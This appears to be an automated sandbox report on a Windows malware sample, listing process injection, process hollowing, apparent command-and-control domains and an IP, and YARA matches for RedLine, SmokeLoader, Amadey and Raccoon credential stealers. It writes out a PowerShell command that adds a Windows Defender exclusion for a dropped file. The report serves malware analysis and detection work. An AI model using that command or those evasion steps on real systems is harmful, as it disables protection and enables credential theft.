Early bird code injection technique detected
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\977B.exe
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: jejhieg.6.dr
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\cnv622JnZv.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\cnv622JnZv.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\8615.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\8615.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\B084.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\B084.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Memory written: C:\Users\user\AppData\Local\Temp\C5EA.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Memory written: unknown base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\977B.exe Memory written: C:\Users\user\AppData\Local\Temp\977B.exe base: 400000 value starts with: 4D5A
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 17_2_02BA0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 17_2_02BA0110
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\cnv622JnZv.exe Thread created: C:\Windows\explorer.exe EIP: 4F61920
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Thread created: unknown EIP: 6D21920
Source: C:\Users\user\AppData\Local\Temp\8615.exe Thread created: unknown EIP: 3B719C0
Source: C:\Users\user\AppData\Local\Temp\B084.exe Thread created: unknown EIP: 6CF1920
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Section unmapped: unknown base address: 400000
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base: 41C000
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base: 41E000
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\977B.exe Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\977B.exe
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process created: C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\cnv622JnZv.exe Process created: C:\Users\user\Desktop\cnv622JnZv.exe 'C:\Users\user\Desktop\cnv622JnZv.exe'
Source: C:\Users\user\AppData\Roaming\jejhieg Process created: C:\Users\user\AppData\Roaming\jejhieg C:\Users\user\AppData\Roaming\jejhieg
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Process created: C:\Users\user\AppData\Local\Temp\C5EA.exe C:\Users\user\AppData\Local\Temp\C5EA.exe
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /SpecialRun 4101d8 4380
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process created: C:\Users\user\AppData\Local\Temp\977B.exe 977B.exe
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process created: C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process created: unknown unknown
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError, 25_2_00401C26
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AE730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 24_2_6B4AE730
Source: explorer.exe, 00000006.00000000.301003169.0000000001640000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.301003169.0000000001640000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.301003169.0000000001640000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000006.00000000.286961405.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000006.00000000.301003169.0000000001640000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000006.00000000.301003169.0000000001640000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\66A4.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Queries volume information: C:\Users\user\AppData\Local\Temp\77DC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\977B.exe Queries volume information: C:\Users\user\AppData\Local\Temp\977B.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\977B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A557.exe Queries volume information: C:\Users\user\AppData\Local\Temp\A557.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A557.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A557.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00410B13 cpuid 34_2_00410B13
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 0_2_004234B0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_004234B0
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_0041F061 _free,_free,_free,GetTimeZoneInformation,_free, 34_2_0041F061
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00401F20 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree, 34_2_00401F20
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 24_2_6B4A4020

Stealing of Sensitive Information:

Yara detected RedLine Stealer
Source: Yara match File source: 00000028.00000000.477374112.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.478964555.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.518079752.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.476131601.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 19.0.jejhieg.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.C5EA.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.cnv622JnZv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.C5EA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.C5EA.exe.2ba15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.jejhieg.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.1.jejhieg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.1.C5EA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.C5EA.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.cnv622JnZv.exe.2dc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.jejhieg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.cnv622JnZv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.8615.exe.2fb0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.C5EA.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.3.8615.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.jejhieg.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.jejhieg.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.8615.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000021.00000002.465682057.00000000047F1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.440048320.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.440144777.0000000002FF1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.320318511.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.379053476.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.302632865.0000000004F61000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.379166058.0000000001F61000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.464888081.0000000002B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.423422124.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.320173015.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Yara detected Amadey bot
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Raccoon Stealer
Source: Yara match File source: 35.3.152F.exe.48f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.152F.exe.48f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.152F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.152F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.460198021.00000000048F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.478734177.0000000000941000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.476969852.00000000013F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.593634201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 152F.exe PID: 1280, type: MEMORYSTR
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: 152F.exe PID: 1280, type: MEMORYSTR

Remote Access Functionality:

Yara detected RedLine Stealer
Yara detected SmokeLoader
Yara detected Raccoon Stealer